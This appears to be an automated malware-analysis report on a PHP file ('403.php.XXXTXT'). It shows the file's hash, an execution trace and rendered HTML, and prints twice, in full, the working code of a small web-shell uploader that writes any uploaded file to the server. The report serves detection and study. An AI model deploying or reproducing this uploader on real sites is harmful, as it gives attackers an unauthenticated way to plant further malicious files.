PHP Malware Analysis

403.php.XXXTXT

md5: 077adaa0dab087ec895b335779673d3b

Jump to:

Screenshot


Attributes

Files

Input


Deobfuscated PHP code

<center>
<font face="Courier new" color="black" size="5">| Coded by MecUs7 |</font>
<style>body{font-size: 0;}h1{font-size: 12px}</style>
<h1><?php 
if ($_POST) {
    if (@copy($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) {
        echo "<b>BERHASIL FILE DI DIR INI</b>-->" . $_FILES["f"]["name"];
    } else {
        echo "<b>GAGAL UPLOAD FILE";
    }
} else {
    echo "<form method=post enctype=multipart/form-data><input type=file name=f><input name=v type=submit id=v value=CROTT!!> <br>";
}
__halt_compiler();?></h1></center>

Execution traces

data/traces/077adaa0dab087ec895b335779673d3b_trace-1676255610.9697.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:33:56.867569]
1	0	1	0.000148	393528
1	3	0	0.000237	395944	{main}	1		/var/www/html/uploads/403.php.XXXTXT	0	0
1	3	1	0.000290	395944
			0.000320	314368
TRACE END   [2023-02-13 00:33:56.867771]


Generated HTML code

<html><head></head><body><center>
<font face="Courier new" color="black" size="5">| Coded by MecUs7 |</font>
<style>body{font-size: 0;}h1{font-size: 12px}</style>
<h1><form method="post" enctype="multipart/form-data"><input type="file" name="f"><input name="v" type="submit" id="v" value="CROTT!!"> <br></form></h1></center></body></html>

Original PHP code

<center>
<font face="Courier new" color="black" size="5">| Coded by MecUs7 |</font>
<style>body{font-size: 0;}h1{font-size: 12px}</style>
<h1><?php if($_POST){ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"<b>BERHASIL FILE DI DIR INI</b>-->".$_FILES["f"]["name"]; }else{ echo"<b>GAGAL UPLOAD FILE"; } }else{ echo "<form method=post enctype=multipart/form-data><input type=file name=f><input name=v type=submit id=v value=CROTT!!> <br>"; }__halt_compiler();?></h1></center>